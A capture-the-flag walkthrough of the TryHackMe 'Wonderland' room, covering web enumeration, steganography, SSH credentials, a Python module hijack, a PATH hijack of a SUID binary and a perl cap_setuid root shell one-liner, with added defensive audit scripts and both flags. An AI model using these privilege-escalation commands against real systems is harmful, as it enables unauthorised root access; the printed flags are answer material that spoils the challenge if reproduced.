[TryHackMe] Wonderland: Walkthrough


Overview

This is a walkthrough of the TryHackMe room "Wonderland".

Task1

Q1.Obtain the flag in user.txt

Run a port scan.

$ nmap -Pn -T4 -sVC -p- 10.201.37.41 -oN nmap_result

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan shows which ports are open.

| Port | Service | Version |
|------|---------|---------|
| 22 | ssh | OpenSSH 7.6p1 |
| 80 | http | Golang net/http server |

Access port 80.


A directory scan found /img and /r.

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://10.201.37.41/FUZZ -recursion -recursion-depth 1 -ic -c

img                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 174ms]
r                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 171ms]

Accessing /r displayed the next page of the story.


Scanning further under /r found /r/a.

$ dirsearch -u http://10.201.37.41/r

[08:58:10] 301 -    0B  - /r/a  ->  a/

Accessing /r/a displayed a further continuation of the story.


Enumerating further under /r/a found /r/a/b.

$ dirsearch -u http://10.201.37.41/r/a

[09:00:08] 301 -    0B  - /r/a/b  ->  b/

The story continued at /r/a/b as well.


From the room title and other clues, the path /r/a/b/b/i/t/ could be guessed; accessing it displayed a page, as expected.


Directory scanning yielded no further information, so the next step is to look at the images used on the web pages.

Download the image used on the top page.

$ wget http://10.201.37.41/img/white_rabbit_1.jpg
--2025-09-14 09:13:00--  http://10.201.37.41/img/white_rabbit_1.jpg
Connecting to 10.201.37.41:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1993438 (1.9M) [image/jpeg]
Saving to: ‘white_rabbit_1.jpg’

white_rabbit_1.jpg                  100%[===================================================================>]   1.90M   254KB/s    in 11s     

2025-09-14 09:13:11 (185 KB/s) - ‘white_rabbit_1.jpg’ saved [1993438/1993438]

Checking white_rabbit_1.jpg for steganography revealed a hidden hint.txt.

$ steghide extract -sf ./white_rabbit_1.jpg 
Enter passphrase: 
wrote extracted data to "hint.txt".

hint.txt referred to /r/a/b/b/i/t.

$ cat hint.txt 
follow the r a b b i t

Looking at /r/a/b/b/i/t/ again, the page source contained alice:HowDothTheLittleCrocodileImproveHisShiningTail.


The SSH login succeeded with the credentials obtained.

$ ssh alice@10.201.37.41

alice@wonderland:~$

There was a root.txt, but alice has no permission to read it.

alice@wonderland:~$ cat root.txt 
cat: root.txt: Permission denied

The hint reads "Everything is upside down here.", so things appear to be reversed.
Reading /root/user.txt gave the user flag.

alice@wonderland:~$ cat /root/user.txt
thm{"Curiouser and curiouser!"}

A.thm{"Curiouser and curiouser!"}

Q2.Escalate your privileges, what is the flag in root.txt?

The alice account was permitted to run /home/alice/walrus_and_the_carpenter.py with the privileges of the rabbit account.

alice@wonderland:~$ sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

/home/alice/walrus_and_the_carpenter.py contains code that prints randomly chosen lines of a poem.

walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.

"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."

The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.

But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.

Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.

The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.

"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."

"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.

"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."

"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?

"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"

"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

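alice has no permission to edit the file, so the focus shifts to import random.

Checking the order in which import searches for modules shows that the script's directory is consulted first.
In the interactive output below the first entry is '' (the current directory); when a script is run, that first entry is the directory containing the Python script.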

>>> import sys
>>> print(sys.path)
['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']

Create a new random module that launches a shell.

alice@wonderland:~$ cat random.py 
import os

os.system('/bin/bash')

Running /home/alice/walrus_and_the_carpenter.py with rabbit's privileges launched a shell as rabbit.

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit

Checking /home/rabbit revealed a program named teaParty with the SUID bit set.

rabbit@wonderland:/home/rabbit$ ls -la
total 40
drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Running teaParty printed a message.

$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sun, 14 Sep 2025 14:32:22 +0000
Ask very nicely, and I will give you some tea while you wait for him

Segmentation fault (core dumped)

Inspecting the contents of teaParty showed that it runs the /bin/echo and date commands.

$ cat teaParty

(omitted)

Welcome to the tea party!
The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for himSegmentation fault (core dumped)

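The date command is not invoked by absolute path, so it looks possible to have an arbitrary date program run instead and escalate privileges.
Create a date file that launches a shell, then set the PATH environment variable.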

rabbit@wonderland:/home/rabbit$ echo "/bin/bash" > date
rabbit@wonderland:/home/rabbit$ chmod 777 date 
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

Running teaParty launched a shell as hatter.

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$

hatter@wonderland:/home/rabbit$ whoami
hatter
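The same pattern can be searched for when auditing setuid binaries. The following is an added example, not part of the original walkthrough: it extracts printable strings from a binary and flags shell command lines in which a chained command is named without an absolute path. The sample bytes are constructed from the strings shown above, and the "first word is an absolute path" rule is a heuristic chosen for this sketch.

```python
import re

SHELL_SPLIT = re.compile(r"&&|\|\||[;|]")

def printable_strings(blob, min_len=6):
    """Equivalent of strings(1): runs of printable ASCII in a binary blob."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]

def relative_commands(blob):
    """Find command lines whose chained commands lack an absolute path.

    Heuristic: a string counts as a command line only if its first word is
    an absolute path (e.g. /bin/echo). Any later segment that starts with a
    bare name is resolved by the shell through the caller-controlled $PATH.
    Quoting is not parsed, so operators inside quotes also split the string.
    """
    hits = []
    for s in printable_strings(blob):
        segments = [seg.strip() for seg in SHELL_SPLIT.split(s)]
        if len(segments) < 2 or not segments[0].startswith("/"):
            continue
        for seg in segments[1:]:
            words = seg.split()
            if words and re.fullmatch(r"[\w.+-]+", words[0]):
                hits.append((words[0], s))
    return hits

# Constructed stand-in for the binary's read-only data, built from the
# strings shown in the walkthrough (NUL-separated).
SAMPLE = b"\x7fELF\x02\x01\x01\x00" + b"\x00".join([
    b"Welcome to the tea party!",
    b"The Mad Hatter will be here soon.",
    b"/bin/echo -n 'Probably by ' && date --date='next hour' -R",
    b"Ask very nicely, and I will give you some tea while you wait for him",
]) + b"\x00"

if __name__ == "__main__":
    for word, line in relative_commands(SAMPLE):
        print(f"PATH-resolved command {word!r} in: {line}")
```

The fix on the program's side is to name every command by absolute path, or to set a fixed PATH before handing a command line to the shell.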

/home/hatter/password.txt contained a password.

hatter@wonderland:/home/rabbit$ cat /home/hatter/password.txt 
WhyIsARavenLikeAWritingDesk?

This was hatter's SSH password.

$ ssh hatter@10.201.37.41

hatter@wonderland:~$

Running linpeas showed that privilege escalation looks possible via the Capabilities section.

hatter@wonderland:/tmp$ ./linpeas.sh

╔══════════╣ Capabilities
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities                                                  
══╣ Current shell capabilities

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

A privilege escalation technique that uses perl's capabilities was found.

Running the command listed on that site gave root privileges.

hatter@wonderland:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami
root
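For auditing, the capability listing above can be checked mechanically. The following is an added example, not part of the original walkthrough: it parses getcap-style lines in both the older `path = caps+ep` and newer `path caps=ep` formats and reports interpreters that hold an identity-changing capability in their effective and permitted sets. The capability and interpreter lists are assumptions to adapt, and the last two sample lines are constructed.

```python
import os
import re

# Capabilities that let a process change identity or bypass file permissions.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_admin", "cap_chown", "cap_fowner"}
# Programs that run caller-supplied code (assumed list, extend as needed).
INTERPRETERS = re.compile(r"^(perl|python|ruby|php|node|lua|gdb|tclsh)[\d.]*$")

def parse_getcap(line):
    """Return (path, {capability: flags}) or None if the line is not a listing."""
    parts = line.split()
    if len(parts) < 2:
        return None
    path, clauses = parts[0], [p for p in parts[1:] if p != "="]
    caps = {}
    for clause in clauses:
        m = re.fullmatch(r"([a-z_0-9,]+)([+=])([eip]+)", clause)
        if not m:
            return None  # header, URL or other non-capability text
        for cap in m.group(1).split(","):
            caps[cap] = set(m.group(3))
    return path, caps

def risky_interpreters(lines):
    """Interpreters whose file capabilities amount to root for any caller."""
    findings = []
    for line in lines:
        parsed = parse_getcap(line)
        if not parsed:
            continue
        path, caps = parsed
        held = sorted(c for c, flags in caps.items()
                      if c in DANGEROUS and {"e", "p"} <= flags)
        if held and INTERPRETERS.match(os.path.basename(path)):
            findings.append((path, held))
    return findings

SAMPLE_LINES = [
    "══╣ Current shell capabilities",
    "/usr/bin/perl5.26.1 = cap_setuid+ep",
    "/usr/bin/mtr-packet = cap_net_raw+ep",
    "/usr/bin/perl = cap_setuid+ep",
    "/opt/example/python3.8 cap_net_bind_service,cap_setuid=ep",  # constructed
    "/usr/bin/ping cap_net_raw=ep",                               # constructed
]

if __name__ == "__main__":
    for path, held in risky_interpreters(SAMPLE_LINES):
        print(path, ",".join(held))
```

A capability that is not needed can be removed from a file with setcap -r followed by the file's path.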

The root flag was in /home/alice/root.txt.

# cat /home/alice/root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}

A.thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
